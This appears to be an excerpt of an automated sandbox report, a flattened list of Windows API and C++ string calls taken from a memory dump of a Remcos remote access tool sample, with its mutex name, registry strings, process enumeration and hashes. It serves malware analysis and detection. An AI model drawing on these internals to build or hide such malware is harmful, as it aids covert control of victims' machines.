                                • Part of subcall function 0040EFB5: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491), ref: 0040EFF1
                                • Part of subcall function 0040EFB5: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040F00F
                                • Part of subcall function 0040EFB5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F019
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F022
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F037
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F044
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F096
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F09F
                                • Part of subcall function 0040EFB5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040F0A8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Software\,00000000,0000000E,004108CC,00000000), ref: 004074C1
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,0000000E,004108CC,00000000), ref: 004074CE
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,004108CC,00000000), ref: 004074DE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004108CC,00000000), ref: 004074E7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,004108CC,00000000), ref: 004074F0
                              • OpenMutexA.KERNEL32(00100000,00000000,Remcos_Mutex_Inj), ref: 00407506
                              • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,004108CC,00000000), ref: 00407516
                                • Part of subcall function 00407D38: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00415978,00000000,00415940,0040759D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D4B
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407D54
                                • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D6F
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407D72
                                • Part of subcall function 00407D38: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D83
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407D86
                                • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DA0
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DA3
                                • Part of subcall function 00407D38: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DB4
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DB7
                                • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DC9
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DCC
                                • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DD9
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DDC
                                • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DED
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407DF0
                                • Part of subcall function 00407D38: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DFD
                                • Part of subcall function 00407D38: GetProcAddress.KERNEL32(00000000), ref: 00407E00
                                • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001C,00415978,00000000,00415940,004075A2,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401013
                                • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040103B
                                • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001F,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401060
                                • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000020,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00401085
                                • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000021,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010AA
                                • Part of subcall function 00401000: CreateThread.KERNEL32(00000000,00000000,004011F8,00000000,00000000,00000000), ref: 004010C0
                                • Part of subcall function 00401000: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000022,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004010D1
                                • Part of subcall function 00401000: CreateThread.KERNEL32(00000000,00000000,00401216,00000000,00000000,00000000), ref: 004010E5
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,004108CC,00000000), ref: 00407527
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407546
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040756B
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407573
                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040757D
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407583
                              • GetModuleFileNameA.KERNEL32(00000000,0041580C,00000104,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075AD
                                • Part of subcall function 00408EF1: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,80000002), ref: 00408F12
                                • Part of subcall function 00408EF1: RegQueryValueExA.ADVAPI32(80000002,004075CB,00000000,00000000,?,00000400), ref: 00408F31
                                • Part of subcall function 00408EF1: RegCloseKey.ADVAPI32(80000002), ref: 00408F3A
                                • Part of subcall function 00408EF1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00410668,?), ref: 00408F59
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075D6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075DF
                                • Part of subcall function 0040F0B5: GetCurrentProcess.KERNEL32(u@,?,?,004075EA), ref: 0040F0C6
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004075FC
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407622
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00410CC4,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407645
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407787
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407799
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004077B4
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 004077BD
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004077D7
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004077ED
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407805
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040781D
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040782F
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407841
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(0041580C,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407865
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407875
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407666
                                • Part of subcall function 00408E4E: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00405FB0,80000001,00000000), ref: 00408E64
                                • Part of subcall function 00408E4E: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,004157E8,?,00405FB0,80000001,00000000), ref: 00408E79
                                • Part of subcall function 00408E4E: RegCloseKey.ADVAPI32(00000000,?,00405FB0,80000001,00000000), ref: 00408E84
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040768E
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000B,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076A9
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076B5
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076C6
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076E2
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000006,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004076FE
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000007,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 0040771A
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407736
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407752
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407768
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 00407893
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040789B
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 004078A6
                                • Part of subcall function 00402A78: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AA3
                                • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AAC
                                • Part of subcall function 00402A78: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AB6
                                • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AC1
                                • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,00415968,00000000,?,?,?,?,?,?,?,?,00407683), ref: 00402AD2
                                • Part of subcall function 00402A78: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(0041580C,?), ref: 00402AF7
                                • Part of subcall function 00402A78: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00410668,00410668,00000000), ref: 00402B24
                                • Part of subcall function 00402A78: ShellExecuteA.SHELL32(00000000,open,00000000), ref: 00402B31
                                • Part of subcall function 00402A78: exit.MSVCRT ref: 00402B3D
                                • Part of subcall function 00402A78: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B46
                                • Part of subcall function 00402A78: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B4F
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 004078D3
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004078DC
                              • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 004078E8
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,00000000,00000001), ref: 004078FD
                                • Part of subcall function 004090D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00415940), ref: 0040910B
                                • Part of subcall function 004090D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409127
                                • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00410844), ref: 0040792A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00407945
                                • Part of subcall function 00407E0B: GetModuleFileNameA.KERNEL32(00000000,?,00000104,004157D0,00000000,00415940), ref: 00407E25
                                • Part of subcall function 00407E0B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410560), ref: 00407E3A
                                • Part of subcall function 00407E0B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00407E53
                                • Part of subcall function 00407E0B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00407E5D
                                • Part of subcall function 00407E0B: Process32First.KERNEL32(?,?), ref: 00407E79
                                • Part of subcall function 00407E0B: Process32Next.KERNEL32(?,00000128), ref: 00407E88
                                • Part of subcall function 00407E0B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00407EA8
                                • Part of subcall function 00407E0B: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60 ref: 00407EB7
                                • Part of subcall function 00407E0B: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407EC1
                                • Part of subcall function 00407E0B: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000), ref: 00407ECB
                                • Part of subcall function 00407E0B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00407EDF
                                • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407EEF
                                • Part of subcall function 00407E0B: Process32Next.KERNEL32(?,00000128), ref: 00407EFF
                                • Part of subcall function 00407E0B: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407F1B
                                • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F24
                                • Part of subcall function 00407E0B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,?), ref: 00407F35
                                • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F40
                                • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407F49
                                • Part of subcall function 00407E0B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408143
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028,?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407969
                              • atoi.MSVCRT ref: 00407970
                              • CreateThread.KERNEL32(00000000,00000000,0040F8BF,00000000,00000000,00000000), ref: 0040799F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079AC
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079C0
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000031,00410668,?,?,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079D5
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000011,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079EC
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 004079FE
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407A17
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000031,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407A30
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000,?,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407A42
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407A5D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004108CC), ref: 00407A66
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407A72
                              • CreateDirectoryA.KERNEL32(00000000), ref: 00407A79
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00415720,004108CC,00000000,00000011), ref: 00407A97
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000011), ref: 00407AA4
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 00407AB0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00407AB9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00407AC2
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407AE0
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407AFB
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B16
                              • CreateThread.KERNEL32(00000000,00000000,0040E157,00000000,00000000,00000000), ref: 00407B2B
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000016,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B38
                              • CreateThread.KERNEL32(00000000,00000000,0040E157,00000001,00000000,00000000), ref: 00407B4E
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000023,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B5B
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000026,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B71
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000025,00000000,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B83
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407B9E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407BA7
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000,00000011), ref: 00407C44
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$?data@?$basic_string@$??1?$basic_string@?c_str@?$basic_string@$V01@@$??0?$basic_string@V01@$??4?$basic_string@$AddressProcV?$basic_string@$CreateD@1@@D@2@@0@Module$Handle$?length@?$basic_string@Thread$??8std@@Hstd@@$?size@?$basic_string@LibraryLoadOpenProcess32$?begin@?$basic_string@?find@?$basic_string@CloseFileMutexNameNextQueryV10@V12@Valuefreemalloc$??2@??9std@@?end@?$basic_string@?substr@?$basic_string@CurrentD@2@@0@0@DirectoryErrorExecuteFirstLastObjectProcessShellSingleSnapshotToolhelp32V10@0@V10@@WaitY?$basic_string@atoiexit
                              • String ID: (32 bit)$ (64 bit)$EXEpath$Inj$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$origmsc
                              • API String ID: 2029078087-2861766086
                              • Opcode ID: a7e76d1f5698b6cb19da30083dfc977b1b734f58d8449f27491d567c095a8673
                              • Instruction ID: 9e524ab3c3c25e5b5afb6edb3c87aefde3ed2a315a96d5f46ca7337cbf0df8a9
                              • Opcode Fuzzy Hash: a7e76d1f5698b6cb19da30083dfc977b1b734f58d8449f27491d567c095a8673
                              • Instruction Fuzzy Hash: 0C227370B05244ABDB0477B1AC5EAEE3B6A9B84305F0044BEF502FA2E1DEBC5D85875D
                              Function 0040EFB5 Relevance: 21.1, APIs: 14, Instructions: 85COMMON
                              Download Yara Rule

